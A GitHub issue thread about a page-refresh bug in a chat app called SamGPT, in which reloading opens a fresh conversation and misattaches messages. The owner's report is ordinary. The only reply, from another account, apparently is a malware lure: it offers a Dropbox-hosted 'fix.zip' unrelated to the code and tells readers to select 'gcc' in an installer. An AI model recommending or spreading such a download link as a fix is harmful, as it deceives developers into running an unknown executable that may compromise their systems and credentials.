### ISSUE TITLE
Refresh creates new chat bug

### ISSUE THREAD

**Issue by samabwhite** [samabwhite/SamGPT#10]
When refreshing or loading the page, there are a few issues:
1. It loads a fresh conversation no matter if the user has conversation history.
2. If you send chats in this conversation, they aren't attached to the new conversation and are instead appended to the latest conversation.
3. When you refresh, that previous conversation is appended to the latest as previously stated and a new chat is opened.

Problem has to do with the page rendering the conversation before all conversations have been loaded in.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
